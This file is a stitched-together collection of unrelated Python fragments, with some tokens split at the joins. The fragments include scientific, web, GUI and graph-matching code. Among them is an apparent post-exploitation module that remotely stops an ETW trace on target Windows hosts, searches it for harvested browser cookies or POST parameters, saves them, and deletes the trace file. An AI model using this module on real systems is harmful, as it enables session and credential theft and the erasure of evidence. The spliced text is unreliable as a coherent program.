lat = cube.coord('latitude')
lat2 = lat.copy()
lat2.attributes['test'] = 'True'
cube.add_aux_coord(lat2, [0])
self.assertString(str(cube), ('cdm', 'str_repr', 'similar.__str__.txt'))
def test_cube_summary_cell_methods(self):
cube = self.cube_2d.copy()
# Create a list of values used to create cell methods
test_values = ((("mean",), (u'longitude', 'latitude'), (u'6 minutes', '12 minutes'), (u'This is a test comment',)),
(("average",), (u'longitude', 'latitude'), (u'6 minutes', '15 minutes'), (u'This is another test comment', 'This is another comment')),
(("average",), (u'longitude', 'latitude'), (), ()),
(("percentile",), (u'longitude',), (u'6 minutes',), (u'This is another test comment',)))
for x in test_values:
# Create a cell method
cm = iris.coords.CellMethod(method=x[0][0], coords=x[1], intervals=x[2], comments=x[3])
cube.add_cell_method(cm)
self.assertString(str(cube), ('cdm', 'str_repr', 'cell_methods.__str__.txt'))
def test_cube_summary_alignment(self):
# Test the cube summary dimension |
"""
Parses the results found for the ETW started on a machine,
downloads the results and stops the ETW.
All credit to pauldotcom-
http://pauldotcom.com/2012/07/post-exploitation-recon-with-e.html
Module built by @harmj0y
"""
import settings
from lib import command_methods
from lib import helpers
from lib import smb
class Module:
def __init__(self, targets=None, creds=None, args=None):
self.name = "ETW Data Download"
self.description = "Download data results from ETW and clean everything up."
# internal list() that holds one or more targets
self.targets = targets
# internal list() that holds one or more cred tuples
# [ (username, pw), (username2, pw2), ...]
self.creds = creds
# a state output file that will be written out by pillage.py
# ex- if you're querying domain users
self.output = ""
# user interaction for- format is {Option : [Value, Description]]}
self.required_options = { "trigger_method" : ["wmis", "[wmis] or [winexe] for triggering"],
"flag" : ["cookies", "search for [cookies] or [post] parameters"]}
def run(self):
# assume single set of credentials
username, password = self.creds[0]
triggerMethod = self.required_options["trigger_method"][0]
flag = self.required_options["flag"][0]
for target in self.targets:
# stop the ETW
stopCMD = "logman stop Status32 -ets"
command_methods.executeCommand(target, username, password, stopCMD, triggerMethod)
# search for cookies or POST paramters
if flag.lower() == "post":
flag = "POST"
moduleFile = "post_params.txt"
else:
flag = "cookie added"
moduleFile = "cookies.txt"
# check the ETW results for the specified flag, and delete the dump file
parseCmd = "wevtutil qe C:\\Windows\\Temp\\status32.etl /lf:true /f:Text | find /i \""+flag+"\""
# wait 20 seconds for everything to parse...if errors happen, increase this
parseResult = command_methods.executeResult(target, username, password, parseCmd, triggerMethod, pause=20)
# delete the trace file
delCmd = "del C:\\Windows\\Temp\\status32.etl"
comman | d_methods.executeCommand(target, username, password, delCmd, triggerMethod)
if parseResult == "":
self.output += "[!] No ETW results for "+flag+" using creds '"+username+":"+password+"' on : " + target + "\n"
else:
| # save the file off to the appropriate location
saveFile = helpers.saveModuleFile(self, target, moduleFile, parseResult)
self.output += "[*] ETW results for "+flag+" using creds '"+username+":"+password+"' on " + target + " stored at "+saveFile+"\n"
|
from .Condition import C | ondition
from .Configuration import Configuration
from .Classifier import Classifier
from .ClassifiersList import ClassifiersList
from .XCS import XCS
from . | GeneticAlgorithm import *
|
# Copyright 2014 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
list_services = {
'status_code': [200],
'response_body': {
'type': 'object',
'properties': {
'services': {
'type': 'array',
'items': {
'type': 'object',
'properties': {
'id': {'type': ['integer', 'string'],
'pattern': '^[a-zA-Z!]*@[0-9]+$'},
'zone': {'type': 'string'},
'host': {'type': 'string'},
'state': {'type': 'string'},
'binary': {'type': 'string'},
'status': {'type': 'string'},
'updated_at': {'type': ['string', 'null']},
'disabled_reason': {'type': ['string', 'null']}
},
'additionalProperties': False,
'required': ['id', 'zone', 'host', 'state', 'binary',
'status', 'updated_at', 'disabled_reason']
}
}
},
'additionalProperties': False,
'required': ['services']
}
}
enable_disable_service = {
'status_code': [200],
'response_body': {
'type': 'object',
'properties': {
'service': {
'type': 'object',
'properties': {
'status': {'type': 'string'},
'binary': {'type': 'string'},
'host': {'type': 'string'}
},
'additionalProperties': False,
'required': ['status', 'binary', 'host']
| }
},
'additionalProperties': False,
'required': ['service']
| }
}
|
fresh()
def Refresh(self, erase=True, rect=None, parent=None):
"""Refreshes the tree when a task has changed"""
if parent is None:
parent = self.root
for child in parent.GetChildren():
task = child.GetData()
if task:
self.SetItemText(child, '0%', 0)
self.SetItemText(child, str(task._priority), 1)
self.SetItemText(child, task.summary, 2)
child.Check(task.is_complete)
if HIDE_COMPLETE:
child.Hide(task.is_complete)
if task.due_date:
self.SetItemText(child, task.due_date.strftime('%H:%M %m/%d/%y'), 3)
else:
self.SetItemText(child, '', 3)
self.Refresh(parent=child)
super(TaskList, self).Refresh()
class TaskInfoDialog(wx.Dialog):
def __init__(self, *args, **kwds):
self.task = kwds.pop('task', None)
kwds['style'] = wx.DEFAULT_DIALOG_STYLE | wx.RESIZE_BORDER | wx.THICK_FRAME
wx.Dialog.__init__(self, *args, **kwds)
self.panel = wx.Panel(self, -1)
self.txtSummary = wx.TextCtrl(self.panel, -1, "")
self.lblNotes = wx.StaticText(self.panel, -1, _('Notes:'), style=wx.ALIGN_RIGHT)
self.txtNotes = wx.TextCtrl(self.panel, -1, "", style=wx.TE_MULTILINE|wx.TE_RICH|wx.TE_WORDWRAP)
self.lblPriority = wx.StaticText(self.panel, -1, _('Priority:'), style=wx.ALIGN_RIGHT)
choices = [p[1] for p in sorted(PRIORITIES.items(), key=lambda p: p[0])]
self.cmbPriority = wx.ComboBox(self.panel, -1, choices=choices, style=wx.CB_DROPDOWN)
self.chkIsComplete = wx.CheckBox(self.panel, -1, _('Is Complete'))
self.lblDateDue = wx.StaticText(self.panel, -1, _('Due:'), style=wx.ALIGN_RIGHT)
self.chkIsDue = wx.CheckBox(self.panel, -1, _('Has due date'))
self.calDueDate = wx.calendar.CalendarCtrl(self.panel, -1)
self.txtTime = TimeCtrl(self.panel, id=-1,
value=datetime.now().strftime('%X'),
style=wx.TE_PROCESS_TAB,
validator=wx.DefaultValidator,
format='24HHMMSS',
fmt24hr=True,
displaySeconds=True,
)
self.__set_properties()
self.__do_layout()
self.chkIsDue.Bind(wx.EVT_CHECKBOX, self.ToggleDueDate)
self.txtSummary.SetFocus()
if self.task is not None:
self.SetTask(self.task)
def __set_properties(self):
self.SetTitle(_('Task Information'))
self.cmbPriority.SetValue(PRIORITIES[DEFAULT_PRIORITY])
self.calDueDate.Enable(False)
self.txtTime.Enable(False)
def __do_layout(self):
mainSizer = wx.BoxSizer(wx.VERTICAL)
sizer = wx.FlexGridSizer(5, 2, 5, 5)
lblSubject = wx.StaticText(self.panel, -1, _('Summary:'))
sizer.Add(lblSubject, 0, wx.EXPAND, 0)
sizer.Add(self.txtSummary, 0, wx.ALL|wx.EXPAND, 0)
sizer.Add(self.lblNotes, 0, wx.EXPAND, 0)
sizer.Add(self.txtNotes, 0, wx.EXPAND, 0)
sizer.Add(self.lblPriority, 0, wx.EXPAND, 0)
sizer.Add(self.cmbPriority, 0, wx.EXPAND, 0)
sizer.Add((20, 20), 0, 0, 0)
sizer.Add(self.chkIsComplete, 0, 0, 0)
sizer.Add(self.lblDateDue, 0, wx.ALIGN_RIGHT, 0)
sizer.Add(self.chkIsDue, 0, 0, 0)
sizer.Add((20, 20), 0, 0, 0)
sizer.Add(self.calDueDate, 0, 0, 0)
sizer.Add((20, 20), 0, 0, 0)
sizer.Add(self.txtTime, 0, 0, 0)
self.panel.SetSizer(sizer)
sizer.AddGrowableRow(1)
sizer.AddGrowableCol(1)
mainSizer.Add(self.panel, 1, wx.ALL|wx.EXPAND, 5)
mainSizer.AddF(self.CreateStdDialogButtonSizer(wx.OK|wx.CANCEL),
wx.SizerFlags(0).Expand().Border(wx.BOTTOM|wx.RIGHT, 5))
self.SetSizer(mainSizer)
mainSizer.Fit(self)
self.Layout()
self.Centre()
size = (290, 450)
self.SetMinSize(size)
self.SetSize(size)
def ToggleDueDate(self, evt):
en = self.chkIsDue.IsChecked()
self.calDueDate.Enable(en)
self.txtTime.Enable(en)
def GetTask(self):
if self.task is None:
self.task = Task()
if self.chkIsDue.IsChecked():
due = self.calDueDate.PyGetDate()
tm = self.txtTime.GetValue()
try:
tm = datetime.strptime(tm, '%H:%M:%S').time()
except:
tm = datetime.strptime(tm, '%H:%M').time()
due = datetime.combine(due, tm)
else:
due = None
self.task.summary = self.txtSummary.GetValue()
self.task.is_complete = self.chkIsComplete.IsChecked()
self.task.due_date = due
self.task.priority = self.cmbPriority.GetValue()
self.task.notes = self.txtNotes.GetValue()
return self.task
def SetTask(self, task):
self.txtSummary.SetValue(task.summary)
self.txtNotes.SetValue(task.notes)
self.cmbPriority.SetStringSelection(task.priority)
self.chkIsComplete.SetValue(task.is_complete)
if task.due_date is not None:
self.chkIsDue.SetValue(True)
self.calDueDate.PySetDate(task.due_date)
self.txtTime.SetValue(task.due_date.strftime('%X'))
self.task = task
class TreeDoFrame(wx.Frame):
"""
This is the main TreeDo window, where your tasks are laid out before you.
"""
def __init__(self):
wx.Frame.__init__(self, None, -1, title=_('TreeDo'), size=(350, 500))
self.SetMinSize((300, 300))
self.CenterOnParent()
| self.toolbar = self.CreateToolBar(wx | .TB_HORIZONTAL | wx.NO_BORDER | wx.TB_FLAT)
self.toolbar.SetToolBitmapSize((24, 24))
save_img = wx.Bitmap('res/save.png', wx.BITMAP_TYPE_PNG)
add_img = wx.Bitmap('res/add.png', wx.BITMAP_TYPE_PNG)
add_sub_img = wx.Bitmap('res/add_subtask.png', wx.BITMAP_TYPE_PNG)
collapse_img = wx.Bitmap('res/collapse.png', wx.BITMAP_TYPE_PNG)
expand_img = wx.Bitmap('res/expand.png', wx.BITMAP_TYPE_PNG)
delete_img = wx.Bitmap('res/delete.png', wx.BITMAP_TYPE_PNG)
self.toolbar.AddSimpleTool(wx.ID_SAVE, save_img, _('Save Task List'), _('Save the task list to the hard drive'))
self.toolbar.AddSimpleTool(ID_ADD_TASK, add_img, _('Add Task'), _('Create a new task'))
self.toolbar.AddSimpleTool(ID_ADD_SUBTASK, add_sub_img, _('Add Sub-Task'), _('Create a new subtask'))
#self.toolbar.AddSimpleTool(ID_COLLAPSE, collapse_img, _('Collapse'), _('Collapse all tasks'))
self.toolbar.AddSimpleTool(ID_EXPAND, expand_img, _('Expand'), _('Expand all tasks'))
self.toolbar.AddSimpleTool(wx.ID_DELETE, delete_img, _('Delete'), _('Delete this task'))
self.Bind(wx.EVT_TOOL, self.OnToolClick)
self.toolbar.Realize()
sizer = wx.BoxSizer(wx.VERTICAL)
self.tree = TaskList(self)
sizer.Add(self.tree, 1, wx.EXPAND)
self.Bind(wx.EVT_SIZE, self.UpdateColumnWidths)
self.tree.Bind(wx.EVT_TREE_SEL_CHANGED, self.ToggleToolbarButtons)
self.tree.SetTasks(DATA.get_list())
self.ToggleToolbarButtons()
def UpdateColumnWidths(self, evt=None):
width, height = self.GetSize()
self.tree.SetColumnWidth(0, 40)
self.tree.SetColumnWidth(1, 20)
self.tree.SetColumnWidth(2, width - 180)
self.tree.SetColumnWidth(3, 100)
evt.Skip()
def ToggleToolbarButtons(self, evt=None):
"""Enable or disable certain toolbar buttons based on the selection"""
enable_sub_btns = (self.tree.GetSelection() != self.tree.root)
self.toolbar.EnableTool(ID_ADD_SUBTASK, enable_sub_btns)
self.toolbar.EnableTool(wx.ID_DELETE, enable_sub_btns)
if evt:
evt.Skip()
def AddTask(self, parent=None):
"""Allows the user to add a new task"""
taskDlg = TaskInfoDialog(self, |
f | rom distutils.core import s | etup
import py2exe
setup(console=['newsputnik.py']) |
import os
from setuptools import setup
########## autover ##########
def get_setup_version | (reponame):
"""Use autover to get up to date version."""
# importing self into setup.py is unorthodox, but param has no
# required dependencies outside of python
from param.version import Versi | on
return Version.setup_version(os.path.dirname(__file__),reponame,archive_commit="$Format:%h$")
########## dependencies ##########
extras_require = {
# pip doesn't support tests_require
# (https://github.com/pypa/pip/issues/1197)
'tests': [
'nose',
'flake8'
]
}
extras_require['all'] = sorted(set(sum(extras_require.values(), [])))
########## metadata for setuptools ##########
setup_args = dict(
name='param',
version=get_setup_version("param"),
description='Declarative Python programming using Parameters.',
long_description=open('README.rst').read() if os.path.isfile('README.rst') else 'Consult README.rst',
author="IOAM",
author_email="developers@topographica.org",
maintainer="IOAM",
maintainer_email="developers@topographica.org",
platforms=['Windows', 'Mac OS X', 'Linux'],
license='BSD',
url='http://ioam.github.com/param/',
packages=["param","numbergen"],
provides=["param","numbergen"],
include_package_data = True,
python_requires=">=2.7",
install_requires=[],
extras_require=extras_require,
tests_require=extras_require['tests'],
classifiers=[
"License :: OSI Approved :: BSD License",
"Development Status :: 5 - Production/Stable",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Operating System :: OS Independent",
"Intended Audience :: Science/Research",
"Intended Audience :: Developers",
"Natural Language :: English",
"Topic :: Scientific/Engineering",
"Topic :: Software Development :: Libraries"]
)
if __name__=="__main__":
setup(**setup_args)
|
# -*- coding: utf-8 -*-
from django.forms import fields
from django.forms import widgets
from djng.forms import field_mixins
from . import widgets as bs3widgets
class BooleanFieldMixin(field_mixins.BooleanFieldMixin):
def get_converted_widget(self):
assert(isinstance(self, fields.BooleanField))
if isinstance(self.widget, widgets.CheckboxInput):
self.widget_css_classes = None
if not isinstance(self.widget, bs3widgets.CheckboxInput):
new_widget = bs3widgets.CheckboxInput(self.label)
new_widget.__dict__, new_widget.choice_label = self.widget.__dict__, new_widget.choice_label
self.label = '' # label is rendered by the widget and not by BoundField.label_tag()
return new_widget
cl | ass ChoiceFieldMixin(field_mixins.ChoiceFieldMixin):
def get_converted_widget(self):
assert(isinstance(self, fields.ChoiceField))
if isinstance(self.widget, widgets.RadioSelect):
self.widget_css_classes = None
| if not isinstance(self.widget, bs3widgets.RadioSelect):
new_widget = bs3widgets.RadioSelect()
new_widget.__dict__ = self.widget.__dict__
return new_widget
class MultipleChoiceFieldMixin(field_mixins.MultipleChoiceFieldMixin):
def get_converted_widget(self):
assert(isinstance(self, fields.MultipleChoiceField))
if isinstance(self.widget, widgets.CheckboxSelectMultiple):
self.widget_css_classes = None
if not isinstance(self.widget, bs3widgets.CheckboxSelectMultiple):
new_widget = bs3widgets.CheckboxSelectMultiple()
new_widget.__dict__ = self.widget.__dict__
return new_widget
|
# -*- coding: utf-8 -*-
##############################################################################
#
# Author: Yannick Buron
# Copyright 2015, TODAY Clouder SASU
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License with Attribution
# clause as published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License with
# Attribution clause along with this program. If not, see
# <http://www.gnu.org/licenses/>.
#
##############################################################################
from odoo import models, api, modules
class ClouderContainer(models.Model):
"""
Add methods to manage the wordpress specificities.
"""
_inherit = 'clouder.service'
@api.multi
def deploy_post(self):
super(ClouderContainer, self).deploy_post()
if self.application_id.type_id.name == 'wordpress':
self.execute([
'wget', '-q', 'https://wordpress.org/latest.tar.gz',
'latest.tar.gz'], path='/var/www/', username='www-data')
self.execute(['tar', '-xzf', 'latest.tar.gz'],
path='/var/www', username='www-data')
self.execute(['rm', '-rf', './*.tar.gz'],
path='/var/www', username='www-data')
class ClouderBase(mod | els.Model):
"""
Add methods to manage the shinken specificities.
"""
_inherit = 'clouder.base'
@api.multi
def deploy_build(self):
"""
Configure nginx.
"""
res = super(ClouderBase, self).deploy_build()
| if self.application_id.type_id.name == 'wordpress':
config_file = '/etc/nginx/sites-available/' + self.fullname
self.service_id.send(
modules.get_module_path('clouder_template_wordpress') +
'/res/nginx.config', config_file)
self.service_id.execute([
'sed', '-i', '"s/BASE/' + self.name + '/g"', config_file])
self.service_id.execute([
'sed', '-i', '"s/DOMAIN/' + self.domain_id.name + '/g"',
config_file])
self.service_id.execute([
'ln', '-s', '/etc/nginx/sites-available/' + self.fullname,
'/etc/nginx/sites-enabled/' + self.fullname])
self.service_id.execute(['/etc/init.d/nginx', 'reload'])
return res
@api.multi
def purge_post(self):
"""
Purge from nginx configuration.
"""
super(ClouderBase, self).purge_post()
if self.application_id.type_id.name == 'wordpress':
self.service_id.execute([
'rm', '-rf', '/etc/nginx/sites-enabled/' + self.fullname])
self.service_id.execute([
'rm', '-rf', '/etc/nginx/sites-available/' + self.fullname])
self.service_id.execute(['/etc/init.d/nginx', 'reload'])
|
zoo_animals = ["pangolin", "cassowary", "sloth", "tiger"]
# Last night our zoo's sloth brutally attacked
#the poor tiger and ate it whole.
# The ferocious sloth has been | replaced by a friendly hyena.
zoo_animals[2] = "hyena"
# What shall fill the void left by our dear departed tiger?
# Your cod | e here!
zoo_animals[3] = 'teta'
|
"""
Classes::
VASPData -- A collection of functions that wrap bash code to extract
data from VASP output into managable .dat (.txt) files.
"""
import numpy as np
from subprocess import call, check_output
from ast import literal_eval
class VASPData(object):
"""
A collection of functions that wrap bash code to extract
data from VASP output into managable .dat (.txt) files.
Variables::
name -- A string containing the path to the
VASP data.
Funtions::
extract_symops_trans -- Get symmetry operations and translations
from OUTCAR -> symops_trans.dat.
extract_kpts_eigenvals -- Get k-points, weights, and eigenvalues
from EIGENVAL -> kpts_eigenvals.dat.
extract_kmax -- Get kmax from KPOINTS -> kmax.dat (details about
what kmax is are given in readdata.py).
"""
def __init__(self, name_of_data_directory, kpts_eigenvals=True,
symops_trans=True, kmax=True):
"""
Arguments::
name_of_data_directory -- See Variables::name.
Keyword Arguments::
kpts_eigenvals, symops_trans, kmax -- All are booleans that
specify if that bit of data should be extracted from the
VASP output files. One may use False if the corresponding
.dat file already exists or is handmade. Default is True for
all three.
"""
self.name = name_of_data_directory
if kpt | s_eigenvals:
self.extract_kpts_eigenvals()
if symops_trans:
self.extract_symops_trans()
if kmax:
self.extract_kmax()
def extract_symops_trans(self):
"""
Use some bash code to look inside OUTCAR, grab the
symmetry operators and translations, and then write them to a
file called symops_trans.dat. File is written to the same folder
the OUTCAR is i | n.
"""
name = self.name
call("grep -A 4 -E 'isymop' " + name + "/OUTCAR | cut -c 11-50 > " +
name + "/symops_trans.dat; echo '' >> " + name +
"/symops_trans.dat", shell=True)
def extract_kpts_eigenvals(self):
""""
Use some bash code to look inside EIGENVAL and grab the
k-points, weights, and eigenvalues associated with each band at
each k-point. Write them to a file called kpts_eigenvals.dat.
File is written to the same folder the EIGENVAL is in.
"""
name = self.name
length = check_output('less ' + name + '/EIGENVAL | wc -l', shell=True)
num = str([int(s) for s in length.split() if s.isdigit()][0] - 7)
call('tail -n' + num + ' ' + name +
'/EIGENVAL | cut -c 1-60 > ' + name + '/kpts_eigenvals.dat',
shell=True)
def extract_kmax(self):
"""
Look inside KPOINTS and grab the number of kpoints used in
one direction. If the grid is not cubic i.e. 12 12 5 it will
take the smallest. Also assumes the KPOINTS has this format:
nxmxp! comment line
0
Monkhorst
12 12 12
0 0 0
at least as far as what line the 12 12 12 is on. To be concrete
the only requirement is that the grid is specified on
the fourth line. If one wishes to use a different format for the
KPOINTS file they can set the kmax bool to False and generate
their own kmax.dat in the same directory as the VASP data to be
used by readdata.py. GRID SIZE ON FOURTH LINE.
"""
name = self.name
with open(name+'/KPOINTS', 'r') as inf:
line = [literal_eval(x) for x in
inf.readlines()[3].strip().split()]
k = min(line)
kmax = np.ceil(k/(2*np.sqrt(3)))
with open(name+'/kmax.dat', 'w') as outf:
outf.write(str(kmax))
|
# Normalize querystring params:
config = current_app.dxr_config
frozen = frozen_config(tree)
req = request.values
query_text = req.get('q', '')
offset = non_negative_int(req.get('offset'), 0)
limit = min(non_negative_int(req.get('limit'), 100), 1000)
is_case_sensitive = req.get('case') == 'true'
# Make a Query:
query = Query(partial(current_app.es.search,
index=frozen['es_alias']),
query_text,
plugins_named(frozen['enabled_plugins']),
is_case_sensitive=is_case_sensitive)
# Fire off one of the two search routines:
searcher = _search_json if _request_wants_json() else _search_html
return searcher(query, tree, query_text, is_case_sensitive, offset, limit, config)
def _search_json(query, tree, query_text, is_case_sensitive, offset, limit, config):
"""Try a "direct search" (for exact identifier matches, etc.). If we have a direct hit,
then return {redirect: hit location}.If that doesn't work, fall back to a normal search
and return the results as JSON."""
# If we're asked to redirect and have a direct hit, then return the url to that.
if request.values.get('redirect') == 'true':
result = query.direct_result()
if result:
path, line = result
# TODO: Does this escape query_text properly?
params = {
'tree': tree,
'path': path,
'from': query_text
}
if is_case_sensitive:
params['case'] = 'true'
return jsonify({'redirect': url_for('.browse', _anchor=line, **params)})
try:
count_and_results = query.results(offset, limit)
# Convert to dicts for ease of manipulation in JS:
results = [{'icon': icon,
'path': path,
'lines': [{'line_number': nb, 'line': l} for nb, l in lines],
'is_binary': is_binary}
for icon, path, lines, is_binary in count_and_results['results']]
except BadTerm as exc:
return jsonify({'error_html': exc.reason, 'error_level': 'warning'}), 400
return jsonify({
'www_root': config.www_root,
'tree': tree,
'results': results,
'result_count': count_and_results['result_count'],
'result_count_formatted': format_number(count_and_results['result_count']),
'tree_tuples': _tree_tuples(query_text, is_case_sensitive)})
def _search_html(query, tree, query_text, is_case_sensitive, offset, limit, config):
"""Return the rendered template for search.html.
"""
frozen = frozen_config(tree)
# Try a normal search:
template_vars = {
'filters': filter_menu_items(
plugins_named(frozen['enabled_plugins'])),
'generated_date': frozen['generated_date'],
'google_analytics_key': config.google_analytics_key,
'is_case_sensitive': is_case_sensitive,
'query': query_text,
'search_url': url_for('.search',
tree=tree,
q=query_text,
redirect='false'),
'top_of_tree': url_for('.browse', tree=tree),
'tree': tree,
'tree_tuples': _tree_tuples(query_text, is_case_sensitive),
'www_root': config.www_root}
return render_template('search.html', **template_vars)
def _tree_tuples(query_text, is_case_sensitive):
"""Return a list of rendering info for Switch Tree menu items."""
return [(f['name'],
url_for('.search',
tree=f['name'],
q=query_text,
**({'case': 'true'} if is_case_sensitive else {})),
f['description'])
for f in frozen_configs()]
@dxr_blueprint.route('/<tree>/raw/<path:path>')
def raw(tree, path):
"""Send raw data at path from tree, for binary things like images."""
query = {
'filter': {
'term': {
'path': path
}
}
}
results = current_app.es.search(
query,
index=es_alias_or_not_found(tree),
doc_type=FILE,
size=1)
try:
# we explicitly get index 0 because there should be exactly 1 result
data = results['hits']['hits'][0]['_source']['raw_data'][0]
except IndexError: # couldn't find the image
raise NotFound
data_file = StringIO(data.decode('base64'))
return send_file(data_file, mimetype=guess_type(path)[0])
@dxr_blueprint.route('/<tree>/source/')
@dxr_blueprint.route('/<tree>/source/<path:path>')
def browse(tree, path=''):
"""Show a directory listing or a single file from one of the trees.
Raise NotFound if path does not exist as either a folder or file.
"""
config = current_app.dxr_config
try:
# Strip any trailing slash because we do not store it in ES.
return _browse_folder(tree, path.rstrip('/'), config)
except NotFound:
frozen = frozen_config(tree)
# Grab the FILE doc, just for the sidebar nav links and the symlink target:
files = filtered_query(
frozen['es_alias'],
FILE,
filter={'path': path},
size=1,
include=['link', 'links'])
if not files:
raise NotFound
if 'link' in files[0]:
# Then this path is a symlink, so redirect to the real thing.
return redirect(url_for('.browse', tree=tree, path=files[0]['link'][0]))
lines = filtered_query(
frozen['es_alias'],
LINE,
filter={'path': path},
sort=['number'],
size=1000000,
include=['conten | t', 'refs', 'regions', 'annotations'])
# Deref the content field in each document. We can do this because we
# do not store empty lines in ES.
for doc in lines:
doc['content'] = doc['content'][0]
return _browse_file | (tree, path, lines, files[0], config, frozen['generated_date'])
def _browse_folder(tree, path, config):
"""Return a rendered folder listing for folder ``path``.
Search for FILEs having folder == path. If any matches, render the folder
listing. Otherwise, raise NotFound.
"""
frozen = frozen_config(tree)
files_and_folders = filtered_query(
frozen['es_alias'],
FILE,
filter={'folder': path},
sort=[{'is_folder': 'desc'}, 'name'],
size=10000,
exclude=['raw_data'])
if not files_and_folders:
raise NotFound
return render_template(
'folder.html',
# Common template variables:
www_root=config.www_root,
tree=tree,
tree_tuples=[
(t['name'],
url_for('.parallel', tree=t['name'], path=path),
t['description'])
for t in frozen_configs()],
generated_date=frozen['generated_date'],
google_analytics_key=config.google_analytics_key,
paths_and_names=_linked_pathname(path, tree),
filters=filter_menu_items(
plugins_named(frozen['enabled_plugins'])),
# Autofocus only at the root of each tree:
should_autofocus_query=path == '',
# Folder template variables:
name=basename(path) or tree,
path=path,
files_and_folders=[
(_icon_class_name(f),
f['name'],
decode_es_datetime(f['modified']) if 'modified' in f else None,
f.get('size'),
url_for('.browse', tree=tree, path=f.get('link', f['path'])[0]),
f.get('is_binary', [False])[0])
for f in files_and_folders])
def skim_file(skimmers, num_lines):
"""Skim contents with all the skimmers, returning the things we need to
make a template. Compare to dxr.build.index_file
:arg skimmers: iterable of FileToSkim objects
:arg num_lines: the number of lines in the file being skimmed
"""
linkses, refses, regionses = [], [], []
annotations_by_line = [[ |
from django.views.generic.edit import CreateView, UpdateView
from .models import AuthoredMock, EditoredMock
from .forms import AuthoredModelFormMock, EditoredModelFormMock
class FormKwargsRequestMixin(object):
def get_form_kwargs(self):
kwargs = super(EditoredMockUpdateView, self).get_form_kwargs(self)
kwargs['request'] = self.request
return kwargs
class AuthoredMockCreateView(FormKwargsRequestMixin, CreateView):
model = AuthoredMock
form = AuthoredModelFormMo | ck
class EditoredMockUpdateView(FormKwargsRequestMixin, UpdateView):
model = Edit | oredMock
form = EditoredModelFormMock
|
queue.append(b)
elif t == 2:
# b became a T-vertex/blossom; assign label S to its mate.
# (If b is a non-trivial blossom, its base is the only vertex
# with an external mate.)
base = blossombase[b]
assignLabel(mate[base], 1, base)
# Trace back from vertices v and w to discover either a new blossom
# or an augmenting path. Return the base vertex of the new blossom,
# or NoNode if an augmenting path was found.
def scanBlossom(v, w):
# Trace back from v and w, placing breadcrumbs as we go.
path = [ ]
base = NoNode
while v is not NoNode:
# Look for a bread | crumb in v's blossom or | put a new breadcrumb.
b = inblossom[v]
if label[b] & 4:
base = blossombase[b]
break
assert label[b] == 1
path.append(b)
label[b] = 5
# Trace one step back.
if labeledge[b] is None:
# The base of blossom b is single; stop tracing this path.
assert blossombase[b] not in mate
v = NoNode
else:
assert labeledge[b][0] == mate[blossombase[b]]
v = labeledge[b][0]
b = inblossom[v]
assert label[b] == 2
# b is a T-blossom; trace one more step back.
v = labeledge[b][0]
# Swap v and w so that we alternate between both paths.
if w is not NoNode:
v, w = w, v
# Remove breadcrumbs.
for b in path:
label[b] = 1
# Return base vertex, if we found one.
return base
# Construct a new blossom with given base, through S-vertices v and w.
# Label the new blossom as S; set its dual variable to zero;
# relabel its T-vertices to S and add them to the queue.
def addBlossom(base, v, w):
bb = inblossom[base]
bv = inblossom[v]
bw = inblossom[w]
# Create blossom.
b = Blossom()
blossombase[b] = base
blossomparent[b] = None
blossomparent[bb] = b
# Make list of sub-blossoms and their interconnecting edge endpoints.
b.childs = path = [ ]
b.edges = edgs = [ (v, w) ]
# Trace back from v to base.
while bv != bb:
# Add bv to the new blossom.
blossomparent[bv] = b
path.append(bv)
edgs.append(labeledge[bv])
assert label[bv] == 2 or (label[bv] == 1 and labeledge[bv][0] == mate[blossombase[bv]])
# Trace one step back.
v = labeledge[bv][0]
bv = inblossom[v]
# Add base sub-blossom; reverse lists.
path.append(bb)
path.reverse()
edgs.reverse()
# Trace back from w to base.
while bw != bb:
# Add bw to the new blossom.
blossomparent[bw] = b
path.append(bw)
edgs.append((labeledge[bw][1], labeledge[bw][0]))
assert label[bw] == 2 or (label[bw] == 1 and labeledge[bw][0] == mate[blossombase[bw]])
# Trace one step back.
w = labeledge[bw][0]
bw = inblossom[w]
# Set label to S.
assert label[bb] == 1
label[b] = 1
labeledge[b] = labeledge[bb]
# Set dual variable to zero.
blossomdual[b] = 0
# Relabel vertices.
for v in b.leaves():
if label[inblossom[v]] == 2:
# This T-vertex now turns into an S-vertex because it becomes
# part of an S-blossom; add it to the queue.
queue.append(v)
inblossom[v] = b
# Compute b.mybestedges.
bestedgeto = { }
for bv in path:
if isinstance(bv, Blossom):
if bv.mybestedges is not None:
# Walk this subblossom's least-slack edges.
nblist = bv.mybestedges
# The sub-blossom won't need this data again.
bv.mybestedges = None
else:
# This subblossom does not have a list of least-slack
# edges; get the information from the vertices.
nblist = [ (v, w)
for v in bv.leaves()
for w in G.neighbors(v)
if v != w ]
else:
nblist = [ (bv, w)
for w in G.neighbors(bv)
if bv != w ]
for k in nblist:
(i, j) = k
if inblossom[j] == b:
i, j = j, i
bj = inblossom[j]
if (bj != b and label.get(bj) == 1 and
((bj not in bestedgeto) or
slack(i, j) < slack(*bestedgeto[bj]))):
bestedgeto[bj] = k
# Forget about least-slack edge of the subblossom.
bestedge[bv] = None
b.mybestedges = list(bestedgeto.values())
# Select bestedge[b].
mybestedge = None
bestedge[b] = None
for k in b.mybestedges:
kslack = slack(*k)
if mybestedge is None or kslack < mybestslack:
mybestedge = k
mybestslack = kslack
bestedge[b] = mybestedge
# Expand the given top-level blossom.
def expandBlossom(b, endstage):
# Convert sub-blossoms into top-level blossoms.
for s in b.childs:
blossomparent[s] = None
if isinstance(s, Blossom):
if endstage and blossomdual[s] == 0:
# Recursively expand this sub-blossom.
expandBlossom(s, endstage)
else:
for v in s.leaves():
inblossom[v] = s
else:
inblossom[s] = s
